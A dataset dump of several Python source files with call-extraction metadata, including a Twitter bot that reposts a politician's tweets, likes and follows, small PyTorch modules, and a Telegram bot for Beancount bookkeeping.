'from django.db.models import Q, Manager\n'), ((373, 19, 375, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id' % self.field_names['src']): self.pk})", False, 'from django.db.models import Q, Manager\n'), ((417, 28, 420, 14), 'django.db.models.Q', 'Q', ({}, {}), '(**{ct_fname: val[0], fk_fname: val[1]})', False, 'from django.db.models import Q, Manager\n'), ((429, 16, 431, 10), 'django.db.models.Q', 'Q', ({}, {}), "(**{('%s_id' % src_fname): self.pk})", False, 'from django.db.models import Q, Manager\n'), ((25, 29, 26, 71), 'django.db.router.db_for_read', 'router.db_for_read', (), '', False, 'from django.db import router\n')] |
vitorduarte/RastreadorDeBolso | rastreador-de-bolso/TwitterListener.py | 5c3bab222fced6f0d7367299b5007a628a408b4f | from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import logging
import coloredlogs
import os
import pathlib
import time
import twitter as tt
from utils import retry
from fetch_likes import get_user_likes, login
from conf.settings import USER_ID, USERNAME, PASSWORD
CURR_PATH = pathlib.Path(__file__).parent.absolute()
TWEETS_FOLDER = os.path.join(CURR_PATH, 'screenshots')
LIKED_FOLDER = os.path.join(CURR_PATH, 'screenshots', 'liked')
class TwitterListener():
def __init__(self, user_id=USER_ID, search_base=40):
# Configure log
coloredlogs.install()
logging.basicConfig()
self.logger = logging.getLogger('TwitterListener')
self.logger.setLevel(logging.DEBUG)
# Set chrome options
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument("--no-sandbox")
self.driver = webdriver.Chrome(options=chrome_options)
# Create formatter, file handler and add they to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('twitter.log')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
self.search_base = search_base
self.user_id = user_id
self.target = tt.get_username_from_id(user_id)
self.is_logged = False,
self.has_previous_tweets = False
self.has_previous_friends = False
self.has_previous_likes = False
def _get_new_tweets(self):
if(not self.has_previous_tweets):
self.previous_tweets_ids = tt.get_ids_from_tweets(
tt.get_tweets(user_id=self.user_id, count=self.search_base))
self.has_previous_tweets = True
last_tweets = tt.get_tweets(user_id=self.user_id,
count=self.search_base)
last_tweets_ids = tt.get_ids_from_tweets(last_tweets)
diff_tweets = self._get_new_diff(
last_tweets_ids, self.previous_tweets_ids)
if diff_tweets:
new_tweets = [last_tweets[i] for i in range(len(diff_tweets))]
self.previous_tweets_ids = last_tweets_ids
new_tweets.reverse()
return new_tweets
return []
def _get_new_likes(self):
count = self.search_base/2
if(not self.is_logged):
login(self.driver, USERNAME, PASSWORD)
self.is_logged = True
if(not self.has_previous_likes):
self.previous_likes_ids = get_user_likes(
self.driver, self.target, count=count)
self.has_previous_likes = True
new_likes_ids = get_user_likes(
self.driver, self.target, count=count)
diff_tweets = self._get_new_diff(
new_likes_ids, self.previous_likes_ids)
if diff_tweets:
self.previous_likes_ids = new_likes_ids
diff_tweets.reverse()
return diff_tweets
return []
def _get_new_diff(self, curr, old):
count = len(old)
return list(set(curr[:count//2]) -
set(old))
def _get_abs_diff(self, first_list, second_list):
return list(set(first_list) - set(second_list))
def print_new_tweets(self):
try:
new_tweets = self._get_new_tweets()
for tweet in new_tweets:
tweet_id = str(tweet['id'])
tweet_url = tt.get_url(tweet)
# Get image
self.logger.info('New tweet %s', tweet_url)
img_path = os.path.join(TWEETS_FOLDER, f'{tweet_id}.png')
retry(tt.print_tweet, tweet_url,
self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
tweet_msg = 'Jair Bolsonaro acabou de twittar'
self.logger.debug(
f'Is a retweet: {"retweeted_status" in tweet}')
if('retweeted_status' in tweet):
tweet_msg = 'Jair Bolsonaro acabou de retweetar'
tt.tweet_print(img_path, tweet_url, tweet_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def print_new_likes(self):
try:
new_likes = self._get_new_likes()
for t_id in new_likes:
t_url = f'https://twitter.com/{self.target}/status/{t_id}'
# Get image
self.logger.info('New like %s', t_url)
img_path = os.path.join(LIKED_FOLDER, f'{t_id}.png')
retry(tt.print_tweet, t_url, self.driver, output_path=img_path)
self.logger.debug('Take a screenshot of tweet')
# Tweet image
t_msg = 'Jair Bolsonaro acabou de curtir esse tweet'
tt.tweet_print(img_path, t_url, t_msg)
self.logger.debug('Tweet the screenshot')
except Exception as e:
self.logger.error(e)
def watch_friends(self):
try:
if(not self.has_previous_friends):
self.previous_friends = tt.get_friends_ids(
user_id=self.user_id)
self.has_previous_friends = True
last_friends = tt.get_friends_ids()
new_friends = self._get_abs_diff(
last_friends, self.previous_friends)
unfriends = self._get_abs_diff(self.previous_friends, last_friends)
for user_id in new_friends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'New friend: @{username}')
retry(
tt.update_status,
status=(
f'Jair Bolsonaro aparentemente está seguindo @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um follow ou por uma reativação de conta)'
)
)
for user_id in unfriends:
username = tt.get_username_from_id(user_id=user_id)
self.logger.info(f'Unfriend: @{username}')
retry(
tt.update_status,
status=(
f'Jair Bolsonaro aparentemente deixou de seguir @{username}.'
'\n(Esse bot não consegue verificar se essa atualização foi gerada '
'por um unfollow, suspensão ou block.)'
)
)
self.previous_friends = last_friends
except Exception as e:
self.logger.error(e)
| [((16, 16, 16, 54), 'os.path.join', 'os.path.join', ({(16, 29, 16, 38): 'CURR_PATH', (16, 40, 16, 53): '"""screenshots"""'}, {}), "(CURR_PATH, 'screenshots')", False, 'import os\n'), ((17, 15, 17, 62), 'os.path.join', 'os.path.join', ({(17, 28, 17, 37): 'CURR_PATH', (17, 39, 17, 52): '"""screenshots"""', (17, 54, 17, 61): '"""liked"""'}, {}), "(CURR_PATH, 'screenshots', 'liked')", False, 'import os\n'), ((23, 8, 23, 29), 'coloredlogs.install', 'coloredlogs.install', ({}, {}), '()', False, 'import coloredlogs\n'), ((24, 8, 24, 29), 'logging.basicConfig', 'logging.basicConfig', ({}, {}), '()', False, 'import logging\n'), ((25, 22, 25, 58), 'logging.getLogger', 'logging.getLogger', ({(25, 40, 25, 57): '"""TwitterListener"""'}, {}), "('TwitterListener')", False, 'import logging\n'), ((29, 25, 29, 34), 'selenium.webdriver.chrome.options.Options', 'Options', ({}, {}), '()', False, 'from selenium.webdriver.chrome.options import Options\n'), ((32, 22, 32, 62), 'selenium.webdriver.Chrome', 'webdriver.Chrome', (), '', False, 'from selenium import webdriver\n'), ((34, 20, 35, 67), 'logging.Formatter', 'logging.Formatter', ({(35, 12, 35, 66): '"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'}, {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')", False, 'import logging\n'), ((36, 13, 36, 47), 'logging.FileHandler', 'logging.FileHandler', ({(36, 33, 36, 46): '"""twitter.log"""'}, {}), "('twitter.log')", False, 'import logging\n'), ((42, 22, 42, 54), 'twitter.get_username_from_id', 'tt.get_username_from_id', ({(42, 46, 42, 53): 'user_id'}, {}), '(user_id)', True, 'import twitter as tt\n'), ((55, 22, 56, 59), 'twitter.get_tweets', 'tt.get_tweets', (), '', True, 'import twitter as tt\n'), ((57, 26, 57, 61), 'twitter.get_ids_from_tweets', 'tt.get_ids_from_tweets', ({(57, 49, 57, 60): 'last_tweets'}, {}), '(last_tweets)', True, 'import twitter as tt\n'), ((80, 24, 81, 50), 'fetch_likes.get_user_likes', 'get_user_likes', (), '', False, 'from fetch_likes import get_user_likes, login\n'), ((15, 12, 15, 34), 'pathlib.Path', 'pathlib.Path', ({(15, 25, 15, 33): '__file__'}, {}), '(__file__)', False, 'import pathlib\n'), ((73, 12, 73, 50), 'fetch_likes.login', 'login', ({(73, 18, 73, 29): 'self.driver', (73, 31, 73, 39): 'USERNAME', (73, 41, 73, 49): 'PASSWORD'}, {}), '(self.driver, USERNAME, PASSWORD)', False, 'from fetch_likes import get_user_likes, login\n'), ((76, 38, 77, 54), 'fetch_likes.get_user_likes', 'get_user_likes', (), '', False, 'from fetch_likes import get_user_likes, login\n'), ((153, 27, 153, 47), 'twitter.get_friends_ids', 'tt.get_friends_ids', ({}, {}), '()', True, 'import twitter as tt\n'), ((52, 16, 52, 75), 'twitter.get_tweets', 'tt.get_tweets', (), '', True, 'import twitter as tt\n'), ((105, 28, 105, 45), 'twitter.get_url', 'tt.get_url', ({(105, 39, 105, 44): 'tweet'}, {}), '(tweet)', True, 'import twitter as tt\n'), ((109, 27, 109, 73), 'os.path.join', 'os.path.join', ({(109, 40, 109, 53): 'TWEETS_FOLDER', (109, 55, 109, 72): 'f"""{tweet_id}.png"""'}, {}), "(TWEETS_FOLDER, f'{tweet_id}.png')", False, 'import os\n'), ((110, 16, 111, 56), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((122, 16, 122, 62), 'twitter.tweet_print', 'tt.tweet_print', ({(122, 31, 122, 39): 'img_path', (122, 41, 122, 50): 'tweet_url', (122, 52, 122, 61): 'tweet_msg'}, {}), '(img_path, tweet_url, tweet_msg)', True, 'import twitter as tt\n'), ((135, 27, 135, 68), 'os.path.join', 'os.path.join', ({(135, 40, 135, 52): 'LIKED_FOLDER', (135, 54, 135, 67): 'f"""{t_id}.png"""'}, {}), "(LIKED_FOLDER, f'{t_id}.png')", False, 'import os\n'), ((136, 16, 136, 79), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((141, 16, 141, 54), 'twitter.tweet_print', 'tt.tweet_print', ({(141, 31, 141, 39): 'img_path', (141, 41, 141, 46): 't_url', (141, 48, 141, 53): 't_msg'}, {}), '(img_path, t_url, t_msg)', True, 'import twitter as tt\n'), ((149, 40, 150, 41), 'twitter.get_friends_ids', 'tt.get_friends_ids', (), '', True, 'import twitter as tt\n'), ((160, 27, 160, 67), 'twitter.get_username_from_id', 'tt.get_username_from_id', (), '', True, 'import twitter as tt\n'), ((162, 16, 169, 17), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n'), ((172, 27, 172, 67), 'twitter.get_username_from_id', 'tt.get_username_from_id', (), '', True, 'import twitter as tt\n'), ((174, 16, 181, 17), 'utils.retry', 'retry', (), '', False, 'from utils import retry\n')] |
pierrealixt/SmartExcel | smartexcel/tests/data/data_models/dummy.py | 19c5b7e6110db3d42965228ea2ae44a65489ac71 | class Dummy():
def __init__(self, data):
self.name = data['name']
self.age = data['age']
self.city = data['city']
class DummyData():
def __init__(self):
self.results = [
Dummy({
'name': 'PA',
'age': 29,
'city': 'Paris'
}),
Dummy({
'name': 'Cairo',
'age': 0,
'city': 'Muizenberg'
}),
Dummy({
'name': 'Carina',
'age': 26,
'city': 'Windhoek'
})
]
def write_name(self, instance, kwargs={}):
return instance.name
def write_age(self, instance, kwargs={}):
return instance.age
def write_city(self, instance, kwargs={}):
return instance.city
def get_age_list(self):
return [i for i in range(0, 99)]
def get_city_list(self):
return [
'Paris',
'Muizenberg',
'Windhoek',
'Saint-Dizier'
]
def write_get_repeat_func(self):
return len(self.results)
def write_get_name_func(self, instance, kwargs={}):
return self.results[kwargs['index']].name
| [] |
HariKrishna-Vydana/ASR_Transformer | ASR_TransV1/Load_sp_model.py | a37dc7f1add148b14ca1d265d72fc4e9d9dd0fc0 | #!/usr/bin/python
import sys
import os
from os.path import join, isdir
import sentencepiece as spm
#--------------------------
def Load_sp_models(PATH):
PATH_model = spm.SentencePieceProcessor()
PATH_model.Load(join(PATH))
return PATH_model
#--------------------------
| [((10, 21, 10, 49), 'sentencepiece.SentencePieceProcessor', 'spm.SentencePieceProcessor', ({}, {}), '()', True, 'import sentencepiece as spm\n'), ((11, 24, 11, 34), 'os.path.join', 'join', ({(11, 29, 11, 33): 'PATH'}, {}), '(PATH)', False, 'from os.path import join, isdir\n')] |
leith-bartrich/fiepipe_desktop | fiepipedesktoplib/gitlabserver/shell/manager.py | 5136141d67a59e9a2afb79f368a6a02f2d61d2da | import typing
from fiepipelib.gitlabserver.data.gitlab_server import GitLabServer
from fiepipelib.gitlabserver.routines.manager import GitLabServerManagerInteractiveRoutines
from fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui import GitLabHostnameInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui import GitLabUsernameInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui import GitLabPrivateTokenInputDefaultShellUI
from fiepipedesktoplib.gitlabserver.shell.gitlabserver import GitLabServerShell
from fiepipedesktoplib.gitlabserver.shell.server_name_var_command import GitLabServerNameVar
from fiepipedesktoplib.locallymanagedtypes.shells.AbstractLocalManagedTypeCommand import LocalManagedTypeCommand
from fiepipedesktoplib.shells.AbstractShell import AbstractShell
from fiepipedesktoplib.shells.variables.fqdn_var_command import FQDNVarCommand
class GitLabServerManagerShell(LocalManagedTypeCommand[GitLabServer]):
def get_routines(self) -> GitLabServerManagerInteractiveRoutines:
return GitLabServerManagerInteractiveRoutines(feedback_ui=self.get_feedback_ui(),
hostname_input_default_ui=GitLabHostnameInputDefaultShellUI(self),
username_input_default_ui=GitLabUsernameInputDefaultShellUI(self),
private_token_input_default_ui=GitLabPrivateTokenInputDefaultShellUI(self))
def get_shell(self, item: GitLabServer) -> AbstractShell:
# no shell currently. We call super instead.
server_name = GitLabServerNameVar()
server_name.set_value(item.get_name())
return GitLabServerShell(server_name)
def get_plugin_names_v1(self) -> typing.List[str]:
ret = super(GitLabServerManagerShell, self).get_plugin_names_v1()
ret.append("gitlabserver.manager")
return ret
def get_prompt_text(self) -> str:
return self.prompt_separator.join(['GitLabServer', 'Manager'])
def main():
shell = GitLabServerManagerShell()
shell.cmdloop()
if __name__ == '__main__':
main()
| [((25, 22, 25, 43), 'fiepipedesktoplib.gitlabserver.shell.server_name_var_command.GitLabServerNameVar', 'GitLabServerNameVar', ({}, {}), '()', False, 'from fiepipedesktoplib.gitlabserver.shell.server_name_var_command import GitLabServerNameVar\n'), ((27, 15, 27, 45), 'fiepipedesktoplib.gitlabserver.shell.gitlabserver.GitLabServerShell', 'GitLabServerShell', ({(27, 33, 27, 44): 'server_name'}, {}), '(server_name)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlabserver import GitLabServerShell\n'), ((19, 80, 19, 119), 'fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui.GitLabHostnameInputDefaultShellUI', 'GitLabHostnameInputDefaultShellUI', ({(19, 114, 19, 118): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_hostname_input_ui import GitLabHostnameInputDefaultShellUI\n'), ((20, 80, 20, 119), 'fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui.GitLabUsernameInputDefaultShellUI', 'GitLabUsernameInputDefaultShellUI', ({(20, 114, 20, 118): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_username_input_ui import GitLabUsernameInputDefaultShellUI\n'), ((21, 85, 21, 128), 'fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui.GitLabPrivateTokenInputDefaultShellUI', 'GitLabPrivateTokenInputDefaultShellUI', ({(21, 123, 21, 127): 'self'}, {}), '(self)', False, 'from fiepipedesktoplib.gitlabserver.shell.gitlab_private_token_input_ui import GitLabPrivateTokenInputDefaultShellUI\n')] |
gaochangfeng/fairseq | fairseq/models/wav2vec/eteh_model/transformer/repeat.py | 70a468230b8fb558caa394322b02fface663e17a | import torch
class MultiSequential(torch.nn.Sequential):
"""Multi-input multi-output torch.nn.Sequential"""
def forward(self, *args):
for m in self:
args = m(*args)
return args
def repeat(N, fn):
"""repeat module N times
:param int N: repeat time
:param function fn: function to generate module
:return: repeated modules
:rtype: MultiSequential
"""
return MultiSequential(*[fn(n) for n in range(N)])
| [] |
troncosoae/jetson-exp | torch_lib/Nets.py | 0c1a46b969b95bb9c350f78955ae6ca7f41b43b5 | import torch
import torch.nn as nn
import torch.nn.functional as F
class MediumNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(
3, out_channels=6, kernel_size=5, padding=0)
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2 = nn.Conv2d(
6, out_channels=16, kernel_size=5, padding=0)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool1(F.relu(self.conv1(x)))
x = self.pool2(F.relu(self.conv2(x)))
x = torch.flatten(x, 1) # flatten all dimensions except batch
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
| [((9, 21, 10, 56), 'torch.nn.Conv2d', 'nn.Conv2d', (), '', True, 'import torch.nn as nn\n'), ((11, 21, 11, 58), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (), '', True, 'import torch.nn as nn\n'), ((12, 21, 13, 57), 'torch.nn.Conv2d', 'nn.Conv2d', (), '', True, 'import torch.nn as nn\n'), ((14, 21, 14, 58), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (), '', True, 'import torch.nn as nn\n'), ((15, 19, 15, 41), 'torch.nn.Linear', 'nn.Linear', ({(15, 29, 15, 35): '16 * 5 * 5', (15, 37, 15, 40): '120'}, {}), '(16 * 5 * 5, 120)', True, 'import torch.nn as nn\n'), ((16, 19, 16, 37), 'torch.nn.Linear', 'nn.Linear', ({(16, 29, 16, 32): '120', (16, 34, 16, 36): '84'}, {}), '(120, 84)', True, 'import torch.nn as nn\n'), ((17, 19, 17, 36), 'torch.nn.Linear', 'nn.Linear', ({(17, 29, 17, 31): '84', (17, 33, 17, 35): '10'}, {}), '(84, 10)', True, 'import torch.nn as nn\n'), ((22, 12, 22, 31), 'torch.flatten', 'torch.flatten', ({(22, 26, 22, 27): 'x', (22, 29, 22, 30): '1'}, {}), '(x, 1)', False, 'import torch\n')] |
umousesonic/zinc | test123.py | 9e170269d3b209a80ac79d5850894ddc1d95c62f | from runner import runner
if __name__ == '__main__':
r = runner()
p = 'public class main{public static void main (String[] args){' \
'public String StudentAnswer(String myInput){' \
'return "myOutput"; ' \
'}System.out.println("hello world!");}}'
print (r.sendCode(p, '')) | [((4, 8, 4, 16), 'runner.runner', 'runner', ({}, {}), '()', False, 'from runner import runner\n')] |
dumbPy/beancount_bot | beancount_bot/bot.py | 388a17f165c22b30e7f6377161eb5bf63578168a | import traceback
import telebot
from telebot import apihelper
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery
from beancount_bot import transaction
from beancount_bot.config import get_config, load_config
from beancount_bot.dispatcher import Dispatcher
from beancount_bot.i18n import _
from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session
from beancount_bot.task import load_task, get_task
from beancount_bot.transaction import get_manager
from beancount_bot.util import logger
apihelper.ENABLE_MIDDLEWARE = True
bot = telebot.TeleBot(token=None, parse_mode=None)
@bot.middleware_handler(update_types=['message'])
def session_middleware(bot_instance, message):
"""
Session middleware
:param bot_instance:
:param message:
:return:
"""
bot_instance.session = get_session_for(message.from_user.id)
#######
# Authentication #
#######
def check_auth() -> bool:
"""
Check if you log in
:return:
"""
return SESS_AUTH in bot.session and bot.session[SESS_AUTH]
@bot.message_handler(commands=['start'])
def start_handler(message: Message):
"""
First chat time authentication
:param message:
:return:
"""
auth = get_session(message.from_user.id, SESS_AUTH, False)
if auth:
bot.reply_to(message, _("Have been authenticated!"))
return
# 要求鉴权
bot.reply_to(message, _("Welcome to the accounting robot!Please enter the authentication token:"))
def auth_token_handler(message: Message):
"""
Login token callback
:param message:
:return:
"""
if check_auth():
return
# Unconfirmation is considered an authentication token
auth_token = get_config('bot.auth_token')
if auth_token == message.text:
set_session(message.from_user.id, SESS_AUTH, True)
bot.reply_to(message, _("Authentic success!"))
else:
bot.reply_to(message, _("Authentication token error!"))
#######
# instruction #
#######
@bot.message_handler(commands=['reload'])
def reload_handler(message):
"""
Overload configuration instruction
:param message:
:return:
"""
if not check_auth():
bot.reply_to(message, _("Please conduct authentication first!"))
return
load_config()
load_task()
bot.reply_to(message, _("Successful overload configuration!"))
@bot.message_handler(commands=['help'])
def help_handler(message):
"""
Help instruction
:param message:
:return:
"""
cmd = message.text
dispatchers = get_manager().dispatchers
if cmd == '/help':
# Create a message button
markup = InlineKeyboardMarkup()
for ind, d in zip(range(len(dispatchers)), dispatchers):
help_btn = _("help:{name}").format(name=d.get_name())
markup.add(InlineKeyboardButton(help_btn, callback_data=f'help:{ind}'))
# 帮助信息
command_usage = [
_("/start - Authentication"),
_("/help - Using help"),
_("/reload - Reload the configuration file"),
_("/task - View, run the task"),
]
help_text = \
_("Account bill Bot\n\nAvailable instruction list:\n{command}\n\nTrade statement syntax help, select the corresponding module,Use /help [Module name] Check.").format(
command='\n'.join(command_usage))
bot.reply_to(message, help_text, reply_markup=markup)
else:
# Display detailed help
name: str = cmd[6:]
flag_found = False
for d in dispatchers:
if name.lower() == d.get_name().lower():
show_usage_for(message, d)
flag_found = True
if not flag_found:
bot.reply_to(message, _("The corresponding name of the transaction statement processor does not exist!"))
def show_usage_for(message: Message, d: Dispatcher):
"""
Show the method of use of a specific processor
:param message:
:param d:
:return:
"""
usage = _("help:{name}\n\n{usage}").format(name=d.get_name(), usage=d.get_usage())
bot.reply_to(message, usage)
@bot.callback_query_handler(func=lambda call: call.data[:4] == 'help')
def callback_help(call: CallbackQuery):
"""
Help statement detailed help
:param call:
:return:
"""
try:
d_id = int(call.data[5:])
dispatchers = get_manager().dispatchers
show_usage_for(call.message, dispatchers[d_id])
except Exception as e:
logger.error(f'{call.id}:Unknown error!', e)
logger.error(traceback.format_exc())
bot.answer_callback_query(call.id, _("Unknown error!\n"+traceback.format_exc()))
@bot.message_handler(commands=['task'])
def task_handler(message):
"""
Task instruction
:param message:
:return:
"""
if not check_auth():
bot.reply_to(message, _("Please conduct authentication first!"))
return
cmd = message.text
tasks = get_task()
if cmd == '/task':
# Show all tasks
all_tasks = ', '.join(tasks.keys())
bot.reply_to(message,
_("Current registration task:{all_tasks}\n"
"able to pass /task [Task Name] Active trigger").format(all_tasks=all_tasks))
else:
# Run task
dest = cmd[6:]
if dest not in tasks:
bot.reply_to(message, _("Task does not exist!"))
return
task = tasks[dest]
task.trigger(bot)
#######
# trade #
#######
@bot.message_handler(func=lambda m: True)
def transaction_query_handler(message: Message):
"""
Trading statement processing
:param message:
:return:
"""
if not check_auth():
auth_token_handler(message)
return
# Treated
manager = get_manager()
try:
tx_uuid, tx = manager.create_from_str(message.text)
# Create a message button
markup = InlineKeyboardMarkup()
markup.add(InlineKeyboardButton(_("Revoke trading"), callback_data=f'withdraw:{tx_uuid}'))
# 回复
bot.reply_to(message, transaction.stringfy(tx), reply_markup=markup)
except ValueError as e:
logger.info(f'{message.from_user.id}:Unable to add transactions', e)
bot.reply_to(message, e.args[0])
except Exception as e:
logger.error(f'{message.from_user.id}:An unknown mistake!Adding a transaction failed.', e)
bot.reply_to(message, _("An unknown mistake!Adding a transaction failed.\n"+traceback.format_exc()))
@bot.callback_query_handler(func=lambda call: call.data[:8] == 'withdraw')
def callback_withdraw(call: CallbackQuery):
"""
Transaction withdrawal callback
:param call:
:return:
"""
auth = get_session(call.from_user.id, SESS_AUTH, False)
if not auth:
bot.answer_callback_query(call.id, _("Please conduct authentication first!"))
return
tx_uuid = call.data[9:]
manager = get_manager()
try:
manager.remove(tx_uuid)
# Modify the original message reply
message = _("Transaction has been withdrawn")
code_format = MessageEntity('code', 0, len(message))
bot.edit_message_text(message,
chat_id=call.message.chat.id,
message_id=call.message.message_id,
entities=[code_format])
except ValueError as e:
logger.info(f'{call.id}:Unable to create trading', e)
bot.answer_callback_query(call.id, e.args[0])
except Exception as e:
logger.error(f'{call.id}:An unknown mistake!Withdrawal of the transaction failed.', e)
bot.answer_callback_query(call.id, _("An unknown mistake!Withdrawal of the transaction failed."))
def serving():
"""
start up Bot
:return:
"""
# set up Token
token = get_config('bot.token')
bot.token = token
# Set a proxy
proxy = get_config('bot.proxy')
if proxy is not None:
apihelper.proxy = {'https': proxy}
# start up
bot.infinity_polling()
| [((17, 6, 17, 50), 'telebot.TeleBot', 'telebot.TeleBot', (), '', False, 'import telebot\n'), ((28, 27, 28, 64), 'beancount_bot.session.get_session_for', 'get_session_for', ({(28, 43, 28, 63): 'message.from_user.id'}, {}), '(message.from_user.id)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((50, 11, 50, 62), 'beancount_bot.session.get_session', 'get_session', ({(50, 23, 50, 43): 'message.from_user.id', (50, 45, 50, 54): 'SESS_AUTH', (50, 56, 50, 61): 'False'}, {}), '(message.from_user.id, SESS_AUTH, False)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((67, 17, 67, 45), 'beancount_bot.config.get_config', 'get_config', ({(67, 28, 67, 44): '"""bot.auth_token"""'}, {}), "('bot.auth_token')", False, 'from beancount_bot.config import get_config, load_config\n'), ((90, 4, 90, 17), 'beancount_bot.config.load_config', 'load_config', ({}, {}), '()', False, 'from beancount_bot.config import get_config, load_config\n'), ((91, 4, 91, 15), 'beancount_bot.task.load_task', 'load_task', ({}, {}), '()', False, 'from beancount_bot.task import load_task, get_task\n'), ((173, 12, 173, 22), 'beancount_bot.task.get_task', 'get_task', ({}, {}), '()', False, 'from beancount_bot.task import load_task, get_task\n'), ((206, 14, 206, 27), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((229, 11, 229, 59), 'beancount_bot.session.get_session', 'get_session', ({(229, 23, 229, 40): 'call.from_user.id', (229, 42, 229, 51): 'SESS_AUTH', (229, 53, 229, 58): 'False'}, {}), '(call.from_user.id, SESS_AUTH, False)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((234, 14, 234, 27), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((259, 12, 259, 35), 'beancount_bot.config.get_config', 'get_config', ({(259, 23, 259, 34): '"""bot.token"""'}, {}), "('bot.token')", False, 'from beancount_bot.config import get_config, load_config\n'), ((262, 12, 262, 35), 'beancount_bot.config.get_config', 'get_config', ({(262, 23, 262, 34): '"""bot.proxy"""'}, {}), "('bot.proxy')", False, 'from beancount_bot.config import get_config, load_config\n'), ((55, 26, 55, 101), 'beancount_bot.i18n._', '_', ({(55, 28, 55, 100): '"""Welcome to the accounting robot!Please enter the authentication token:"""'}, {}), "('Welcome to the accounting robot!Please enter the authentication token:')", False, 'from beancount_bot.i18n import _\n'), ((69, 8, 69, 58), 'beancount_bot.session.set_session', 'set_session', ({(69, 20, 69, 40): 'message.from_user.id', (69, 42, 69, 51): 'SESS_AUTH', (69, 53, 69, 57): '(True)'}, {}), '(message.from_user.id, SESS_AUTH, True)', False, 'from beancount_bot.session import get_session, SESS_AUTH, get_session_for, set_session\n'), ((92, 26, 92, 67), 'beancount_bot.i18n._', '_', ({(92, 28, 92, 66): '"""Successful overload configuration!"""'}, {}), "('Successful overload configuration!')", False, 'from beancount_bot.i18n import _\n'), ((103, 18, 103, 31), 'beancount_bot.transaction.get_manager', 'get_manager', ({}, {}), '()', False, 'from beancount_bot.transaction import get_manager\n'), ((106, 17, 106, 39), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), ((210, 17, 210, 39), 'telebot.types.InlineKeyboardMarkup', 'InlineKeyboardMarkup', ({}, {}), '()', False, 'from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, MessageEntity, Message, CallbackQuery\n'), ((238, 18, 238, 53), 'beancount_bot.i18n._', '_', ({(238, 20, 238, 52): '"""Transaction has been withdrawn"""'}, {}), "('Transaction has been withdrawn')", False, 'from beancount_bot.i18n import _\n'), ((52, 30, 52, 61), 'beancount_bot.i18n._', '_', ({(52, 32, 52, 60): '"""Have been authenticated!"""'}, {}), "('Have been authenticated!')", False, 'from beancount_bot.i18n import _\n'), ((70, 30, 70, 55), 'beancount_bot.i18n._', '_', ({(70, 32, 70, 54): '"""Authentic success!"""'}, {}), "('Authentic success!')", False, 'from beancount_bot.i18n import _\n'), ((72, 30, 72, 64), 'beancount_bot.i18n._', '_', ({(72, 32, 72, 63): '"""Authentication token error!"""'}, {}), "('Authentication token error!')", False, 'from beancount_bot.i18n import _\n'), ((88, 30, 88, 73), 'beancount_bot.i18n._', '_', ({(88, 32, 88, 72): '"""Please conduct authentication first!"""'}, {}), "('Please conduct authentication first!')", False, 'from beancount_bot.i18n import _\n'), ((112, 12, 112, 40), 'beancount_bot.i18n._', '_', ({(112, 14, 112, 39): '"""/start - Authentication"""'}, {}), "('/start - Authentication')", False, 'from beancount_bot.i18n import _\n'), ((113, 12, 113, 35), 'beancount_bot.i18n._', '_', ({(113, 14, 113, 34): '"""/help - Using help"""'}, {}), "('/help - Using help')", False, 'from beancount_bot.i18n import _\n'), ((114, 12, 114, 56), 'beancount_bot.i18n._', '_', ({(114, 14, 114, 55): '"""/reload - Reload the configuration file"""'}, {}), "('/reload - Reload the configuration file')", False, 'from beancount_bot.i18n import _\n'), ((115, 12, 115, 43), 'beancount_bot.i18n._', '_', ({(115, 14, 115, 42): '"""/task - View, run the task"""'}, {}), "('/task - View, run the task')", False, 'from beancount_bot.i18n import _\n'), ((140, 12, 140, 41), 'beancount_bot.i18n._', '_', ({(140, 14, 140, 40): '"""help:{name}\n\n{usage}"""'}, {}), '("""help:{name}\n\n{usage}""")', False, 'from 